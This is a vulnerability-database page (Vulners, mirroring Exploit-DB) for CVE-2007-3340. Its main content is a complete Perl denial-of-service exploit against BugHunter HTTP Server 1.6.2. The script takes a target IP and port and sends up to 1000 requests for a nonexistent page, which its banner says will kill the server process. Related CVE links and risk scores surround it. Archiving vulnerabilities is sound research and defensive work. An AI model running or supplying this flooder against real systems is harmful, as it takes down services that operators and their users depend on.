Lucene search
+L

BugHunter HTTP Server 1.6.2 - 'httpsv.exe' GET 404 Remote Denial of Service

🗓️ 21 Jun 2007 00:00:00Reported by PriliType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

BugHunter HTTP Server 1.6.2 - 'httpsv.exe' GET 404 Remote Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-3340
21 Jun 200722:00
cve
cvelist
Cvelist
CVE-2007-3340
21 Jun 200722:00
cvelist
nvd
NVD
CVE-2007-3340
21 Jun 200722:30
nvd
prion
Prion
Null pointer dereference
21 Jun 200722:30
prion
#!/usr/bin/perl
#GetOpt STD module
use IO::Socket;
use Getopt::Std;
getopts(":i:p:",\%args);
if(defined $args{i}){
$ip = $args{i};
}
if(defined $args{p}){
$port = $args{p};
}
if(!defined $args{i} or !defined $args{p}){
print "-----------------------------------------------------\n";
print "HTTP SERVER (httpsv1.6.2) 404 Denial of Services\n";
print "Site: http://httpsv.sourceforge.net/\n ";
print "Info: If u send to the server between 40-1000 requests\n";
print "to nonexisting pages the process will die.\n";
print "Found By Prili - imprili[at]gmail.com\n";
print "Usage: perl $0 -i <ip address> -p <port> \n";
print "Thanks to shinnai for the inspiration.\n";
print "-----------------------------------------------------\n";
exit;
}
$protocol = "tcp";
while ($i<=1000)
{
$request = "GET /AAAAAAA HTTP/1.0 \n\n";
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
                               PeerPort=>$port,
                               Proto=>$protocol,
                               Timeout=>'1') || die "Can't connect to address!\n";

print "sending request number $i...\n";
print $socket $request;
close($socket);
$i++;
}

# milw0rm.com [2007-06-21]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.8
EPSS0.04078
41